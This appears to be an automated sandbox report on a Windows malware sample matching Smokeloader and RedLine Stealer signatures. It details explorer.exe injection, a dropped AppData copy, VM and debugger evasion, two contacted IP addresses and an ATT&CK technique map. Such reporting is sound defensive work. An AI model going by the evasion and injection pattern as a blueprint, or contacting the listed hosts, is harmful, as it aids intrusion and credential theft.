      Source: C:\Users\user\Desktop\FyDBXJE74v.exeCode function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,0_2_00403277
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeCode function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014FE
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeCode function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,0_2_00403290
      Source: C:\Users\user\AppData\Roaming\wsbgrghCode function: 5_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401514
      Source: C:\Users\user\AppData\Roaming\wsbgrghCode function: 5_2_00402F97 RtlCreateUserThread,NtTerminateProcess,5_2_00402F97
      Source: C:\Users\user\AppData\Roaming\wsbgrghCode function: 5_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401542
      Source: C:\Users\user\AppData\Roaming\wsbgrghCode function: 5_2_00403247 NtTerminateProcess,GetModuleHandleA,5_2_00403247
      Source: C:\Users\user\AppData\Roaming\wsbgrghCode function: 5_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401549
      Source: C:\Users\user\AppData\Roaming\wsbgrghCode function: 5_2_0040324F NtTerminateProcess,GetModuleHandleA,5_2_0040324F
      Source: C:\Users\user\AppData\Roaming\wsbgrghCode function: 5_2_00403256 NtTerminateProcess,GetModuleHandleA,5_2_00403256
      Source: C:\Users\user\AppData\Roaming\wsbgrghCode function: 5_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401557
      Source: C:\Users\user\AppData\Roaming\wsbgrghCode function: 5_2_0040326C NtTerminateProcess,GetModuleHandleA,5_2_0040326C
      Source: C:\Users\user\AppData\Roaming\wsbgrghCode function: 5_2_00403277 NtTerminateProcess,GetModuleHandleA,5_2_00403277
      Source: C:\Users\user\AppData\Roaming\wsbgrghCode function: 5_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004014FE
      Source: C:\Users\user\AppData\Roaming\wsbgrghCode function: 5_2_00403290 NtTerminateProcess,GetModuleHandleA,5_2_00403290
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeCode function: 0_2_00415F500_2_00415F50
      Source: C:\Users\user\AppData\Roaming\wsbgrghCode function: 5_2_00415F505_2_00415F50
      Source: FyDBXJE74v.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000000.00000002.1827444929.0000000002C9D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000000.00000002.1827317925.0000000002C41000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.1827175401.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000005.00000002.2069915449.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000005.00000002.2069997356.0000000002E11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.1827149563.0000000002BC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000005.00000002.2070115442.0000000002E4C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000005.00000002.2069943713.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: FyDBXJE74v.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: wsbgrgh.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: classification engineClassification label: mal100.troj.evad.winEXE@2/2@4/2
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeCode function: 0_2_02CA0A22 CreateToolhelp32Snapshot,Module32First,0_2_02CA0A22
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wsbgrghJump to behavior
      Source: FyDBXJE74v.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: FyDBXJE74v.exeReversingLabs: Detection: 39%
      Source: FyDBXJE74v.exeVirustotal: Detection: 41%
      Source: unknownProcess created: C:\Users\user\Desktop\FyDBXJE74v.exe "C:\Users\user\Desktop\FyDBXJE74v.exe"
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\wsbgrgh C:\Users\user\AppData\Roaming\wsbgrgh
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeSection loaded: msvcr100.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\wsbgrghSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\wsbgrghSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\wsbgrghSection loaded: msvcr100.dllJump to behavior
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Data Obfuscation

      barindex
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeUnpacked PE file: 0.2.FyDBXJE74v.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.kibojis:W;.xeto:W;.rsrc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Roaming\wsbgrghUnpacked PE file: 5.2.wsbgrgh.400000.0.unpack .text:ER;.rdata:R;.data:W;.kibojis:W;.xeto:W;.rsrc:R; vs .text:EW;
      Source: FyDBXJE74v.exeStatic PE information: section name: .kibojis
      Source: FyDBXJE74v.exeStatic PE information: section name: .xeto
      Source: wsbgrgh.1.drStatic PE information: section name: .kibojis
      Source: wsbgrgh.1.drStatic PE information: section name: .xeto
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeCode function: 0_2_004014D9 pushad ; ret 0_2_004014E9
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeCode function: 0_2_004031DB push eax; ret 0_2_004032AB
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeCode function: 0_2_02BC1540 pushad ; ret 0_2_02BC1550
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeCode function: 0_2_02C9D7E4 pushad ; retf 0_2_02C9D7E5
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeCode function: 0_2_02CA447B push esp; ret 0_2_02CA447D
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeCode function: 0_2_02CA331B pushfd ; iretd 0_2_02CA331C
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeCode function: 0_2_02CA281E push B63524ADh; retn 001Fh0_2_02CA2855
      Source: C:\Users\user\AppData\Roaming\wsbgrghCode function: 5_2_004014D9 pushad ; ret 5_2_004014E9
      Source: C:\Users\user\AppData\Roaming\wsbgrghCode function: 5_2_004031DB push eax; ret 5_2_004032AB
      Source: C:\Users\user\AppData\Roaming\wsbgrghCode function: 5_2_02DE1540 pushad ; ret 5_2_02DE1550
      Source: C:\Users\user\AppData\Roaming\wsbgrghCode function: 5_2_02E535B3 push esp; ret 5_2_02E535B5
      Source: C:\Users\user\AppData\Roaming\wsbgrghCode function: 5_2_02E51956 push B63524ADh; retn 001Fh5_2_02E5198D
      Source: C:\Users\user\AppData\Roaming\wsbgrghCode function: 5_2_02E52453 pushfd ; iretd 5_2_02E52454
      Source: FyDBXJE74v.exeStatic PE information: section name: .text entropy: 7.557544545964827
      Source: wsbgrgh.1.drStatic PE information: section name: .text entropy: 7.557544545964827
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wsbgrghJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wsbgrghJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\fydbxje74v.exeJump to behavior
      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\wsbgrgh:Zone.Identifier read attributes | deleteJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\wsbgrghKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\wsbgrghKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\wsbgrghKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\wsbgrghKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\wsbgrghKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\wsbgrghKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
      Source: C:\Users\user\AppData\Roaming\wsbgrghAPI/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\AppData\Roaming\wsbgrghAPI/Special instruction interceptor: Address: 7FFE2220D584
      Source: wsbgrgh, 00000005.00000002.2070030613.0000000002E3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 459Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3602Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 843Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 358Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1222Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 893Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 863Jump to behavior
      Source: C:\Windows\explorer.exe TID: 7628Thread sleep count: 459 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 7636Thread sleep count: 3602 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 7636Thread sleep time: -360200s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 7632Thread sleep count: 843 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 7632Thread sleep time: -84300s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 8004Thread sleep count: 273 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 8008Thread sleep count: 318 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 8008Thread sleep time: -31800s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 8012Thread sleep count: 358 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 8012Thread sleep time: -35800s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 7636Thread sleep count: 1222 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 7636Thread sleep time: -122200s >= -30000sJump to behavior
      Source: explorer.exe, 00000001.00000000.1814416539.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: explorer.exe, 00000001.00000000.1813742183.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
      Source: explorer.exe, 00000001.00000000.1811826279.00000000078A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
      Source: explorer.exe, 00000001.00000000.1814416539.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: explorer.exe, 00000001.00000000.1811826279.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
      Source: explorer.exe, 00000001.00000000.1810364612.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
      Source: explorer.exe, 00000001.00000000.1811826279.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000001.00000000.1814416539.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
      Source: explorer.exe, 00000001.00000000.1811826279.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
      Source: explorer.exe, 00000001.00000000.1813742183.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
      Source: explorer.exe, 00000001.00000000.1813742183.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1813742183.00000000097D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000001.00000000.1814416539.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
      Source: explorer.exe, 00000001.00000000.1813742183.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
      Source: explorer.exe, 00000001.00000000.1810364612.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
      Source: explorer.exe, 00000001.00000000.1810364612.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeSystem information queried: ModuleInformationJump to behavior
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      barindex
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\wsbgrghSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\wsbgrghProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeCode function: 0_2_02BC0D90 mov eax, dword ptr fs:[00000030h]0_2_02BC0D90
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeCode function: 0_2_02BC092B mov eax, dword ptr fs:[00000030h]0_2_02BC092B
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeCode function: 0_2_02CA02FF push dword ptr fs:[00000030h]0_2_02CA02FF
      Source: C:\Users\user\AppData\Roaming\wsbgrghCode function: 5_2_02DE0D90 mov eax, dword ptr fs:[00000030h]5_2_02DE0D90
      Source: C:\Users\user\AppData\Roaming\wsbgrghCode function: 5_2_02DE092B mov eax, dword ptr fs:[00000030h]5_2_02DE092B
      Source: C:\Users\user\AppData\Roaming\wsbgrghCode function: 5_2_02E4F437 push dword ptr fs:[00000030h]5_2_02E4F437

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\explorer.exeFile created: wsbgrgh.1.drJump to dropped file
      Source: C:\Windows\explorer.exeNetwork Connect: 109.175.29.39 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 78.89.199.216 80Jump to behavior
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeThread created: C:\Windows\explorer.exe EIP: 13A19A8Jump to behavior
      Source: C:\Users\user\AppData\Roaming\wsbgrghThread created: unknown EIP: 87F19A8Jump to behavior
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: C:\Users\user\AppData\Roaming\wsbgrghSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\wsbgrghSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: explorer.exe, 00000001.00000000.1813742183.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1811644828.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1810623937.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000001.00000000.1810623937.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000001.00000000.1810364612.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
      Source: explorer.exe, 00000001.00000000.1810623937.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: explorer.exe, 00000001.00000000.1810623937.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeCode function: 0_2_00415F50 InterlockedCompareExchange,ReadConsoleA,FindAtomW,SetConsoleMode,SearchPathW,SetDefaultCommConfigW,MoveFileW,GetVersionExW,DisconnectNamedPipe,ReadConsoleOutputW,GetModuleFileNameA,LCMapStringA,GetBoundsRect,PulseEvent,SetCommState,GetConsoleAliasesLengthA,GetStringTypeExW,BuildCommDCBA,GetTimeFormatW,GetFileAttributesW,GetConsoleAliasExesLengthA,GetBinaryType,LoadLibraryA,InterlockedDecrement,0_2_00415F50

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000000.00000002.1827317925.0000000002C41000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1827175401.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2069997356.0000000002E11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2069943713.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000000.00000002.1827317925.0000000002C41000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1827175401.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2069997356.0000000002E11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2069943713.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Exploitation for Client Execution
      1
      DLL Side-Loading
      32
      Process Injection
      11
      Masquerading
      OS Credential Dumping511
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading
      12
      Virtualization/Sandbox Evasion
      LSASS Memory12
      Virtualization/Sandbox Evasion
      Remote Desktop ProtocolData from Removable Media2
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)32
      Process Injection
      Security Account Manager3
      Process Discovery
      SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Hidden Files and Directories
      NTDS1
      Application Window Discovery
      Distributed Component Object ModelInput Capture113
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
      Obfuscated Files or Information
      LSA Secrets1
      File and Directory Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
      Software Packing
      Cached Domain Credentials13
      System Information Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading
      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
